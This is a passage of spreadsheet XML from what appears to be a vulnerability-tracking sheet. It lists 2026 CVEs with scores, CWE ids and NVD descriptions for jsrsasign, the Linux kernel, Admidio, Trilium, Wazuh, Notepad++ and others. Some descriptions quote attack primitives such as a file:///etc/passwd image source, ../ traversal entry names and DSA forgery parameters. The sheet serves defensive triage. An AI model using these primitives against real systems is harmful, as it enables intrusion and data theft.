        </is>
      </c>
      <c r="J1825" s="5" t="inlineStr"/>
      <c r="K1825" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1825" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign before 11.1.1 are vulnerable to Improper Verification of Cryptographic Signature via the DSA domain-parameter validation in KJUR.crypto.DSA.setPublic (and the related DSA/X509 verification flow in src/dsa-2.0.js). An attacker can forge DSA signatures or X.509 certificates that X509.verifySignature() accepts by supplying malicious domain parameters such as g=1, y=1, and a fixed r=1, which make the verification equation true for any hash.</t>
        </is>
      </c>
      <c r="M1825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4600</t>
        </is>
      </c>
    </row>
    <row r="1826">
      <c r="A1826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46099</t>
        </is>
      </c>
      <c r="C1826" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1826" s="5" t="inlineStr"/>
      <c r="F1826" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1826" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1826" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1826" s="5" t="inlineStr">
        <is>
          <t>2026-05-27</t>
        </is>
      </c>
      <c r="J1826" s="5" t="inlineStr"/>
      <c r="K1826" s="5" t="inlineStr">
        <is>
          <t>CWE-911</t>
        </is>
      </c>
      <c r="L1826" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: fix NOREF dst use in seg6 and rpl lwtunnels
seg6_input_core() and rpl_input() call ip6_route_input() which sets a
NOREF dst on the skb, then pass it to dst_cache_set_ip6() invoking
dst_hold() unconditionally.
On PREEMPT_RT, ksoftirqd is preemptible and a higher-priority task can
release the underlying pcpu_rt between the lookup and the caching
through a concurrent FIB lookup on a shared nexthop.
Simplified race sequence:
  ksoftirqd/X                       higher-prio task (same CPU X)
  -----------                       --------------------------------
  seg6_input_core(,skb)/rpl_input(skb)
    dst_cache_get()
      -&gt; miss
    ip6_route_input(skb)
      -&gt; ip6_pol_route(,skb,flags)
         [RT6_LOOKUP_F_DST_NOREF in flags]
        -&gt; FIB lookup resolves fib6_nh
           [nhid=N route]
        -&gt; rt6_make_pcpu_route()
           [creates pcpu_rt, refcount=1]
             pcpu_rt-&gt;sernum = fib6_sernum
             [fib6_sernum=W]
           -&gt; cmpxchg(fib6_nh.rt6i_pcpu,
                      NULL, pcpu_rt)
              [slot was empty, store succeeds]
      -&gt; skb_dst_set_noref(skb, dst)
         [dst is pcpu_rt, refcount still 1]
                                    rt_genid_bump_ipv6()
                                      -&gt; bumps fib6_sernum
                                         [fib6_sernum from W to Z]
                                    ip6_route_output()
                                      -&gt; ip6_pol_route()
                                        -&gt; FIB lookup resolves fib6_nh
                                           [nhid=N]
                                        -&gt; rt6_get_pcpu_route()
                                             pcpu_rt-&gt;sernum != fib6_sernum
                                             [W &lt;&gt; Z, stale]
                                          -&gt; prev = xchg(rt6i_pcpu, NULL)
                                          -&gt; dst_release(prev)
                                             [prev is pcpu_rt,
                                              refcount 1-&gt;0, dead]
    dst = skb_dst(skb)
    [dst is the dead pcpu_rt]
    dst_cache_set_ip6(dst)
      -&gt; dst_hold() on dead dst
      -&gt; WARN / use-after-free
For the race to occur, ksoftirqd must be preemptible (PREEMPT_RT without
PREEMPT_RT_NEEDS_BH_LOCK) and a concurrent task must be able to release
the pcpu_rt. Shared nexthop objects provide such a path, as two routes
pointing to the same nhid share the same fib6_nh and its rt6i_pcpu
entry.
Fix seg6_input_core() and rpl_input() by calling skb_dst_force() after
ip6_route_input() to force the NOREF dst into a refcounted one before
caching.
The output path is not affected as ip6_route_output() already returns a
refcounted dst.</t>
        </is>
      </c>
      <c r="M1826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46099</t>
        </is>
      </c>
    </row>
    <row r="1827">
      <c r="A1827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47231</t>
        </is>
      </c>
      <c r="C1827" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1827" s="5" t="inlineStr"/>
      <c r="F1827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1827" s="5" t="inlineStr"/>
      <c r="H1827" s="5" t="inlineStr"/>
      <c r="I1827" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1827" s="5" t="inlineStr"/>
      <c r="K1827" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L1827" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. Prior to version 5.0.10, `modules/documents-files.php` gates state-changing modes by checking that the actor has `hasUploadRight()` on the URL parameter `folder_uuid`. The `move_save` handler then operates on a *separate* URL parameter `file_uuid` and calls `File::moveToFolder($destFolderUUID)`. `File::moveToFolder()` checks the upload right on the destination folder but never on the source folder containing the file. As a result, any user who can upload to any single folder can move any file from any other folder — including private folders to which they have no view rights — into a folder they control, and then download it. Confidentiality is broken (private file contents leak) and integrity is broken (the file is removed from the original location). Version 5.0.10 contains a fix.</t>
        </is>
      </c>
      <c r="M1827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47231</t>
        </is>
      </c>
    </row>
    <row r="1828">
      <c r="A1828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47297</t>
        </is>
      </c>
      <c r="C1828" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1828" s="5" t="inlineStr"/>
      <c r="F1828" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1828" s="5" t="inlineStr"/>
      <c r="H1828" s="5" t="inlineStr"/>
      <c r="I1828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1828" s="5" t="inlineStr"/>
      <c r="K1828" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1828" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t>
        </is>
      </c>
    </row>
    <row r="1829">
      <c r="A1829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48081</t>
        </is>
      </c>
      <c r="C1829" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1829" s="5" t="inlineStr"/>
      <c r="F1829" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1829" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1829" s="5" t="inlineStr"/>
      <c r="I1829" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1829" s="5" t="inlineStr"/>
      <c r="K1829" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1829" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, a TENANT_ADMIN can store `javascript:` URLs in the tenant `links` configuration (`website`, `imprint`, `privacyStatement`). These values are returned to the patient-facing landing page via `/api/public`, hydrated into the SvelteKit Button component, and rendered as `&lt;a href="javascript:..."&gt;` elements without URL-scheme filtering. A patient who clicks any such link executes the attacker's JavaScript inside the patient browser origin, where patient form data is read before client-side encryption is applied. This breaks the project's central trust claim that the server is an untrusted relay and that administrators cannot read patient data. Patient-side encryption happens after form input, so JavaScript executing in the patient origin can read or alter the plaintext before encryption is performed. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M1829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48081</t>
        </is>
      </c>
    </row>
    <row r="1830">
      <c r="A1830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50979</t>
        </is>
      </c>
      <c r="C1830" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1830" s="5" t="inlineStr"/>
      <c r="F1830" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G1830" s="5" t="inlineStr"/>
      <c r="H1830" s="5" t="inlineStr"/>
      <c r="I1830" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1830" s="5" t="inlineStr"/>
      <c r="K1830" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1830" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in the 'advanced/curl' component of Osbil Technology oPanel v1.19.50 and earlier allows authenticated attackers to execute arbitrary shell commands via the 'url' parameter</t>
        </is>
      </c>
      <c r="M1830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50979</t>
        </is>
      </c>
    </row>
    <row r="1831">
      <c r="A1831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52521</t>
        </is>
      </c>
      <c r="C1831" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1831" s="5" t="inlineStr"/>
      <c r="F1831" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1831" s="5" t="inlineStr"/>
      <c r="H1831" s="5" t="inlineStr"/>
      <c r="I1831" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1831" s="5" t="inlineStr"/>
      <c r="K1831" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1831" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability in Z-BlogPHP 1.7.5 allows authenticated attackers to execute arbitrary SQL commands via the id parameter in the CommentBat feature.</t>
        </is>
      </c>
      <c r="M1831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52521</t>
        </is>
      </c>
    </row>
    <row r="1832">
      <c r="A1832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52793</t>
        </is>
      </c>
      <c r="C1832" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1832" s="5" t="inlineStr"/>
      <c r="F1832" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1832" s="5" t="inlineStr"/>
      <c r="H1832" s="5" t="inlineStr"/>
      <c r="I1832" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1832" s="5" t="inlineStr"/>
      <c r="K1832" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1832" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.7, the API authentication path in lib/Froxlor/Api/FroxlorRPC.php and FroxlorRPC::validateAuth accepts an API key and secret for an administrator or customer account without checking type_2fa, validating a TOTP code, or invoking FroxlorTwoFactorAuth. The web interface requires a second factor for accounts with two-factor authentication enabled, but the API grants access after validating only the API credentials, expiration, API permission, and account status. An attacker who obtains an API key and secret for a protected account can call the available API functions without supplying the configured second factor, which can expose or modify customer data, domains, email and FTP accounts, databases, DNS records, and certificate material. This issue is fixed in version 2.3.7.</t>
        </is>
      </c>
      <c r="M1832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52793</t>
        </is>
      </c>
    </row>
    <row r="1833">
      <c r="A1833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53510</t>
        </is>
      </c>
      <c r="C1833" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1833" s="5" t="inlineStr"/>
      <c r="F1833" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1833" s="5" t="inlineStr"/>
      <c r="H1833" s="5" t="inlineStr"/>
      <c r="I1833" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1833" s="5" t="inlineStr"/>
      <c r="K1833" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1833" s="5" t="inlineStr">
        <is>
          <t>Savon is a Ruby SOAP client. From 0.9.8 until 2.17.2, Savon::Model .all_operations interpolates attacker-controlled WSDL operation names into Ruby source passed to module_eval, allowing Ruby code execution in the application process. This issue is fixed in version 2.17.2.</t>
        </is>
      </c>
      <c r="M1833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53510</t>
        </is>
      </c>
    </row>
    <row r="1834">
      <c r="A1834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53580</t>
        </is>
      </c>
      <c r="C1834" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1834" s="5" t="inlineStr"/>
      <c r="F1834" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1834" s="5" t="inlineStr"/>
      <c r="H1834" s="5" t="inlineStr"/>
      <c r="I1834" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1834" s="5" t="inlineStr"/>
      <c r="K1834" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-552, CWE-73</t>
        </is>
      </c>
      <c r="L1834" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the automatic image-download feature accepts file:// URLs in a note's img tags and reads the referenced local file with no path validation, allowing any authenticated user to disclose arbitrary files readable by the Trilium process. When a text note is saved, Trilium scans its HTML for image sources and downloads each external one; because the HTML sanitizer keeps file as an allowed scheme, a source such as file:///etc/passwd is passed straight to a filesystem read and its contents are stored as a note attachment the user can then retrieve. Pointing the same primitive at an unbounded source such as /dev/zero causes uncontrolled memory allocation that crashes the server process. The feature is enabled by default and is reachable through the web UI, the ETAPI, the web clipper, and note imports, requiring only an authenticated session or an ETAPI token. This issue is fixed in version 0.104.0</t>
        </is>
      </c>
      <c r="M1834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53580</t>
        </is>
      </c>
    </row>
    <row r="1835">
      <c r="A1835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54083</t>
        </is>
      </c>
      <c r="C1835" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1835" s="5" t="inlineStr"/>
      <c r="F1835" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1835" s="5" t="inlineStr"/>
      <c r="H1835" s="5" t="inlineStr"/>
      <c r="I1835" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1835" s="5" t="inlineStr"/>
      <c r="K1835" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1835" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. The  ip-customblock  active response script contains a path traversal vulnerability that lets an attacker create or delete arbitrary files on the filesystem as root. The script builds a file path by concatenating the  srcip  field taken from alert JSON directly onto the fixed  /ipblock/  base directory, without validating that the value is a well-formed IP address. Because the extraction routine returns the raw string unchecked, an attacker who can trigger alert-matching log events with a crafted  srcip  containing  ../  sequences can escape the base directory. The block action opens the resulting path in append mode, creating an empty file at an arbitrary location, while the unblock action passes it to remove(), deleting an arbitrary file; since the active response daemon runs as root, this includes sensitive files such as system credentials and Wazuh configuration. Unlike the sibling scripts host-deny.c, default-firewall-drop.c, and firewalld-drop.c, which reject non-IP input via get_ip_version(), ip-customblock.c omits this validation. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M1835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54083</t>
        </is>
      </c>
    </row>
    <row r="1836">
      <c r="A1836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54330</t>
        </is>
      </c>
      <c r="C1836" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1836" s="5" t="inlineStr"/>
      <c r="F1836" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1836" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1836" s="5" t="inlineStr"/>
      <c r="I1836" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1836" s="5" t="inlineStr"/>
      <c r="K1836" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1836" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the Ceph Object Gateway (RGW) SigV4 handler does not reject requests that carry x-amz-* headers absent from the signed header set, allowing anyone holding a presigned URL to attach arbitrary unsigned x-amz-* headers that RGW will honor. AWS S3 requires every x-amz-* header on a SigV4 request to be signed and rejects requests bearing additional unsigned headers, but RGW validates only the headers listed in X-Amz-SignedHeaders and ignores any extra ones, so they take effect without being covered by the signature. By adding such headers to a presigned PUT URL, an attacker can grant themselves more capabilities than the URL's signer intended and escalate their privileges. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M1836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54330</t>
        </is>
      </c>
    </row>
    <row r="1837">
      <c r="A1837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55007</t>
        </is>
      </c>
      <c r="C1837" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1837" s="5" t="inlineStr"/>
      <c r="F1837" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1837" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1837" s="5" t="inlineStr"/>
      <c r="I1837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1837" s="5" t="inlineStr"/>
      <c r="K1837" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1837" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t>
        </is>
      </c>
    </row>
    <row r="1838">
      <c r="A1838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55065</t>
        </is>
      </c>
      <c r="C1838" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1838" s="5" t="inlineStr"/>
      <c r="F1838" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1838" s="5" t="inlineStr"/>
      <c r="H1838" s="5" t="inlineStr"/>
      <c r="I1838" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1838" s="5" t="inlineStr"/>
      <c r="K1838" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L1838" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. From 0.24.6 until 2.4.0, DELETE /api/v1/projects/:project/views/:view permits an authenticated user to supply a view identifier from another project while authorizing only against an attacker-controlled project identifier. ProjectView.CanDelete in pkg/models/project_view_permissions.go does not establish that the view belongs to the path project, and ProjectView.Delete in pkg/models/project_view.go continues after the scoped project_views delete affects no rows. Its subsequent deletes select task_buckets and task_positions only by project_view_id, allowing cross-tenant destruction of Kanban assignments and ordering while leaving the victim view and tasks intact. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M1838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55065</t>
        </is>
      </c>
    </row>
    <row r="1839">
      <c r="A1839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55228</t>
        </is>
      </c>
      <c r="C1839" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1839" s="5" t="inlineStr"/>
      <c r="F1839" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1839" s="5" t="inlineStr"/>
      <c r="H1839" s="5" t="inlineStr"/>
      <c r="I1839" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1839" s="5" t="inlineStr"/>
      <c r="K1839" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1839" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, the REST API did not properly enforce the scope of project- and workspace-scoped teams, allowing a user to submit invalid team configurations through the API. By assigning projects to a team via these unvalidated requests, a user could grant access to projects they were not authorized to see or manage. This could expose private projects and permit translation, repository, and project-management operations outside the user's intended permission scope. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="M1839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55228</t>
        </is>
      </c>
    </row>
    <row r="1840">
      <c r="A1840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57233</t>
        </is>
      </c>
      <c r="C1840" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1840" s="5" t="inlineStr"/>
      <c r="F1840" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1840" s="5" t="inlineStr"/>
      <c r="H1840" s="5" t="inlineStr"/>
      <c r="I1840" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1840" s="5" t="inlineStr"/>
      <c r="K1840" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1840" s="5" t="inlineStr">
        <is>
          <t>Notepad++ is a free and open-source source code editor. Prior to 8.9.7, the WinGup decompress function joins untrusted ZIP entry names to unzipDestTo without canonical containment validation, allowing an entry such as ../mimeTools/mimeTools.dll to overwrite a DLL in a sibling plugin directory and execute attacker-controlled code when Notepad++ next loads that plugin. This issue is fixed in version 8.9.7.</t>
        </is>
      </c>
      <c r="M1840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57233</t>
        </is>
      </c>
    </row>
    <row r="1841">
      <c r="A1841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61641</t>
        </is>
      </c>
      <c r="C1841" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1841" s="5" t="inlineStr"/>
      <c r="F1841" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1841" s="5" t="inlineStr"/>
      <c r="H1841" s="5" t="inlineStr"/>
      <c r="I1841" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1841" s="5" t="inlineStr"/>
      <c r="K1841" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1841" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. From version 4.0.0 to before version 4.9.6, Wallos's OIDC login links an incoming OIDC identity to an existing local account by matching the email claim alone, without verifying that the IdP marked that email as verified (email_verified). When Wallos is configured against an IdP that lets a user present an arbitrary or unverified email (multi-tenant IdPs, IdPs with open self-registration, or any IdP the attacker partly controls), an attacker with no Wallos account can authenticate with the admin's email and be logged in as the admin — full account takeover, no password needed. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="M1841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61641</t>
        </is>
      </c>
    </row>
    <row r="1842">
      <c r="A1842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61699</t>
        </is>
      </c>
      <c r="C1842" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1842" s="5" t="inlineStr"/>
      <c r="F1842" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1842" s="5" t="inlineStr"/>
      <c r="H1842" s="5" t="inlineStr"/>
      <c r="I1842" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1842" s="5" t="inlineStr"/>
      <c r="K1842" s="5" t="inlineStr">
        <is>
          <t>CWE-299, CWE-672</t>
        </is>
      </c>
      <c r="L1842" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.7.1, revocation is the only in-band mechanism that isolates a compromised/offboarded host from a Nebula mesh. Because the blocklist never reaches any peer's config.yml, a Blocked host retains full overlay reachability to every peer under its CA (and internal services on the mesh) for up to 30d (agent) / 365d (mobile). An attacker who exfiltrates host.key+host.crt can run stock slackhq/nebula directly, ignore the agent's 403/410 poll responses, and stay connected after the operator revokes the host. Operator-visible state (UI shows blocked, audit log records it) is misleading. This issue has been patched in version 0.7.1.</t>
        </is>
      </c>
      <c r="M1842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61699</t>
        </is>
      </c>
    </row>
    <row r="1843">
      <c r="A1843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62667</t>
        </is>
      </c>
      <c r="C1843" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1843" s="5" t="inlineStr"/>
      <c r="F1843" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1843" s="5" t="inlineStr"/>
      <c r="H1843" s="5" t="inlineStr"/>
      <c r="I1843" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1843" s="5" t="inlineStr"/>
      <c r="K1843" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1843" s="5" t="inlineStr">
        <is>
